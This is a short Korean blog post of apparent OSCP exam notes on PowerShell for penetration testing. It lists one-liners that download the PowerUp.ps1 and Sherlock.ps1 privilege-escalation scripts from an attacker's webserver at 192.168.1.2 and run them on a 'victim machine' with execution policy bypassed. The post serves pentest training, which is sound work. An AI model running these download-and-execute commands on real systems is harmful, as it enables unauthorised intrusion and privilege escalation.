파워 쉘 for 침투테스트-2

OSCP/시험대비

파워 쉘 for 침투테스트-2

우와해커 2020. 7. 15. 14:52

http://virgil-cj.blogspot.com/2018/02/escalation-time.html

These one-liners download the script from your webserver and run it directly on the victim machine.

c:\>powershell.exe "IEX(New-Object Net.WebClient).downloadString('http://192.168.1.2:8000/PowerUp.ps1') ; Invoke-AllChecks"

c:\>powershell.exe -ExecutionPolicy Bypass -noLogo -Command "IEX(New-Object Net.WebClient).downloadString('http://192.168.1.2:8000/powerup.ps1') ; Invoke-AllChecks"

c:\>powershell.exe "IEX(New-Object Net.WebClient).downloadString('http://192.168.1.2:8000/Sherlock.ps1') ; Find-AllVulns"

If you have your ps1 file downloaded to the victim machine then run using this

c:\>powershell.exe -exec bypass -Command "& {Import-Module .\Sherlock.ps1; Find-AllVulns}"

c:\>powershell.exe -exec bypass -Command "& {Import-Module .\PowerUp.ps1; Invoke-AllChecks}"

I always prefer the one-liners, clean and simple, but you might lose your shell after executing it.

저작자표시